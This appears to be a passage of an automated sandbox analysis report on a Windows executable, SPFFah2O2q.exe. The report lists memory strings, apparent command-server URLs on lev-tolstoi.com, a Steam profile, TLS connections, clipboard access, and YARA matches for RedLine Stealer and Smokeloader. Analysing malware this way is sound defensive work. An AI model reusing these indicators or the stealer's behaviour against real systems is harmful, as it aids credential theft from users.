            Source: SPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000527000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000525000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;;
            Source: SPFFah2O2q.exe, 00000000.00000003.1613523066.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1585634513.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583828888.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583861132.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1612693637.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1723469776.0000000002EFF000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584113176.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613191723.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1613811549.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1584143316.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1583702027.0000000002EF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/CDaU
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/Conte
            Source: SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000554000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1510014210.000000000053D000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509863915.0000000000553000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000002.1720458759.00000000005B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
            Source: SPFFah2O2q.exe, 00000000.00000003.1533195787.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiC
            Source: SPFFah2O2q.exe, 00000000.00000003.1533066550.000000000050D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/https:
            Source: SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/m/r
            Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.000000000050D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/safe-e
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509926082.0000000000507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steamp
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533023771.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SPFFah2O2q.exe, 00000000.00000003.1534204760.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534063958.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1534124766.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: SPFFah2O2q.exe, 00000000.00000003.1510014210.0000000000540000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1533066550.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: SPFFah2O2q.exe, 00000000.00000003.1585583635.0000000002F7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: SPFFah2O2q.exe, 00000000.00000003.1585712337.000000000318F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: SPFFah2O2q.exe, 00000000.00000003.1509829884.0000000000597000.00000004.00000020.00020000.00000000.sdmp, SPFFah2O2q.exe, 00000000.00000003.1509907198.000000000059B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004088500_2_00408850
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004218A00_2_004218A0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004221900_2_00422190
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0040ACF00_2_0040ACF0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00437DF00_2_00437DF0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004095800_2_00409580
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004157990_2_00415799
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004238600_2_00423860
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004388100_2_00438810
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041682D0_2_0041682D
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004288CB0_2_004288CB
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043D8800_2_0043D880
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004309400_2_00430940
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004039700_2_00403970
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004209390_2_00420939
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004179C10_2_004179C1
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004231C20_2_004231C2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004241C00_2_004241C0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043B1D00_2_0043B1D0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004291DD0_2_004291DD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043D9800_2_0043D980
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004059900_2_00405990
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043D9970_2_0043D997
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043D9990_2_0043D999
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004091B00_2_004091B0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042CA490_2_0042CA49
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042DA530_2_0042DA53
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004162630_2_00416263
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0040EA100_2_0040EA10
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004152200_2_00415220
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042CAD00_2_0042CAD0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004252DD0_2_004252DD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041B2E00_2_0041B2E0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004062800_2_00406280
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043DA800_2_0043DA80
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041E2900_2_0041E290
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041CB400_2_0041CB40
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043D34D0_2_0043D34D
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00426B500_2_00426B50
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043DB600_2_0043DB60
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00436B080_2_00436B08
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042830D0_2_0042830D
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042CB110_2_0042CB11
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004043200_2_00404320
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042CB220_2_0042CB22
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004253270_2_00425327
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004083300_2_00408330
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043F3300_2_0043F330
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042A33F0_2_0042A33F
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0040DBD90_2_0040DBD9
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004243800_2_00424380
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041FC750_2_0041FC75
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041DC000_2_0041DC00
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00429C2B0_2_00429C2B
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004291DD0_2_004291DD
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004074F00_2_004074F0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041148F0_2_0041148F
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042AC900_2_0042AC90
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043ECA00_2_0043ECA0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0040CD460_2_0040CD46
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004375000_2_00437500
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004225100_2_00422510
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00417DEE0_2_00417DEE
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041759F0_2_0041759F
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00425E700_2_00425E70
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00436E740_2_00436E74
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004276030_2_00427603
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00425E300_2_00425E30
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004286C00_2_004286C0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043AEC00_2_0043AEC0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004266D00_2_004266D0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004236E20_2_004236E2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00405EE00_2_00405EE0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041DE800_2_0041DE80
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00402F500_2_00402F50
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00420F500_2_00420F50
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00438F590_2_00438F59
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004067100_2_00406710
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00423F200_2_00423F20
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043F7200_2_0043F720
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00419F300_2_00419F30
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0041E7C00_2_0041E7C0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004197C20_2_004197C2
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0042DFE90_2_0042DFE9
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0040A7800_2_0040A780
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_00411F900_2_00411F90
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_004187920_2_00418792
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0043EFB00_2_0043EFB0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212F2170_2_0212F217
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210D2300_2_0210D230
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211E2500_2_0211E250
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021123F70_2_021123F7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021080550_2_02108055
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021280570_2_02128057
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021160D70_2_021160D7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021270DB0_2_021270DB
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210E0E70_2_0210E0E7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212B1270_2_0212B127
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F61470_2_020F6147
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021131660_2_02113166
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210A1970_2_0210A197
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021111B70_2_021111B7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021021F70_2_021021F7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021156940_2_02115694
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021146870_2_02114687
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021016F60_2_021016F6
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F77570_2_020F7757
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021127770_2_02112777
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021277670_2_02127767
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F97E70_2_020F97E7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F94170_2_020F9417
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021194440_2_02119444
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210E4F70_2_0210E4F7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F64E70_2_020F64E7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0211351D0_2_0211351D
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210B5470_2_0210B547
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212F5970_2_0212F597
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F45870_2_020F4587
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F85970_2_020F8597
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212D5B40_2_0212D5B4
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0210EA270_2_0210EA27
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02109A290_2_02109A29
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02128A770_2_02128A77
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F8AB70_2_020F8AB7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02111B070_2_02111B07
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02110BA00_2_02110BA0
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_02120BA70_2_02120BA7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F3BD70_2_020F3BD7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F5BF70_2_020F5BF7
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021078060_2_02107806
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021169370_2_02116937
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_021189270_2_02118927
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020F69770_2_020F6977
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_0212F9870_2_0212F987
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeCode function: 0_2_020FA9E70_2_020FA9E7
